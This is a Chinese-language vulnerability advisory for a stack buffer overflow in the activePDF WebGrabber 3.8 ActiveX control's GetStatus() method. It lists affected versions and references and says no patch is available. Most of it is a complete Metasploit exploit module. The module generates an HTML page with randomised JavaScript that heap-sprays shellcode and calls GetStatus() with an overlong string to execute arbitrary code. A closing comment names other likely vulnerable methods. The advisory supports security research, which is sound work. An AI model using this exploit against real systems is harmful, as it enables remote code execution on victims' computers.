内容安全 
大数据安全 
网络安全 
更多产品 
ActivePDF WebGrabber APWebGrb.ocx GetStatus() 方法溢出漏洞
信息来源:vendor 发表日期:2013-05-01 14:59:00
activePDF服务器用于为企业或Web应用提供集成的PDF生成和动态PDF转换功能。
activePDF WebGrabber 3.8的GetStatus()方法在处理超长的字符串时存在栈缓冲区溢出漏洞,成功利用后可导致执行任意代码。
受影响系统:
activePDF activePDF 3.8
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!##
# $Id: activepdf_webgrabber.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require \'msf/core\'
class Metasploit3 < Msf::Exploit::Remote
Rank = LowRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
\'Name\' => \'activePDF WebGrabber ActiveX Control Buffer Overflow\',
\'Description\' => %q{
This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When
sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)
an attacker may be able to execute arbitrary code. This control is not marked safe
for scripting, so choose your attack vector accordingly.
},
\'License\' => MSF_LICENSE,
\'Author\' => [ \'MC\' ],
\'Version\' => \'$Revision: 10998 $\',
\'References\' =>
[
[ \'OSVDB\', \'64579\'],
[ \'URL\', \'http://www.activepdf.com/products/serverproducts/webgrabber/\' ],
],
\'DefaultOptions\' =>
{
\'EXITFUNC\' => \'process\',
\'DisablePayloadHandler\' => \'true\',
},
\'Payload\' =>
{
\'Space\' => 1024,
\'BadChars\' => "\\x00",
},
\'Platform\' => \'win\',
\'Targets\' =>
[
[ \'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7\', { \'Ret\' => 0x0A0A0A0A } ]
],
\'DisclosureDate\' => \'Aug 26 2008\',
\'DefaultTarget\' => 0))
register_options(
[
OptString.new(\'FILENAME\', [ false, \'The file name.\', \'msf.html\']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack(\'L\'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject(\'APWebGrabber.Object\');
var #{rand1} = unescape(\'#{shellcode}\');
var #{rand2} = unescape(\'#{nops}\');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 800; #{var_i}++) { #{rand8} = #{rand8} + unescape(\'#{ret}\') }
#{vname}.GetStatus(#{rand8},1);
} catch( e ) { window.location = \'about:blank\' ; }
</script>
</head>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Creating \'#{datastore[\'FILENAME\']}\' file ...")
file_create(content)
end
end
=begin
Other methods that are vulnerable.
[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]
void CleanUp(BSTR ServerIPAddress, long ServerPort);
[id(0x00000055)]
BSTR Wait(BSTR IPAddress, long PortNumber, short WaitTime, BSTR AcceptedCommands);
...and probably more.
=end
解决办法:
厂商补丁:
activePDF
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.activepdf.com/products/serverproducts/server/index.cfm
参考信息:
http://osvdb.org/show/osvdb/64579
